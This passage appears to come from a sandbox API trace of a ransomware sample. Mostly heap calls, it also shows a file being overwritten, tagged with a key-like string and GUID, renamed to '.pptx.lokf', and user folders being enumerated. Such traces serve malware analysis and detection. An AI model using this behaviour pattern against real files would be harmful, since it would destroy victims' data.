hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85de8 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e00 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85dd0 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.422] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e18 [0060.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85de8 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e18 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e00 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85dd0 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85db8 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89328 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.424] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x29da, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x29da, lpOverlapped=0x0) returned 1 [0060.424] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.425] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x29df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.425] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.425] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.425] CloseHandle (hObject=0x5cc) returned 1 [0060.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.426] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.426] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\sj-YHyN9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\sj-yhyn9.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\sj-YHyN9.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\sj-yhyn9.pptx.lokf")) returned 1 [0060.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.426] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.427] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0060.427] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1d38e0, ftCreationTime.dwHighDateTime=0x1d4c88b, ftLastAccessTime.dwLowDateTime=0xd0471700, ftLastAccessTime.dwHighDateTime=0x1d4c620, ftLastWriteTime.dwLowDateTime=0xd0471700, ftLastWriteTime.dwHighDateTime=0x1d4c620, nFileSizeHigh=0x0, nFileSizeLow=0x29df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sj-YHyN9.pptx", cAlternateFileName="SJ-YHY~1.PPT")) returned 0 [0060.427] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0060.428] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.428] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\") returned="-Y1PqBS8_MAyXOFE\\" [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\") returned="eIv9rDB\\" [0060.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.431] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0060.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89328 [0060.431] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.431] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.431] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.431] PathFindFileNameW (pszPath="") returned="" [0060.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.431] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 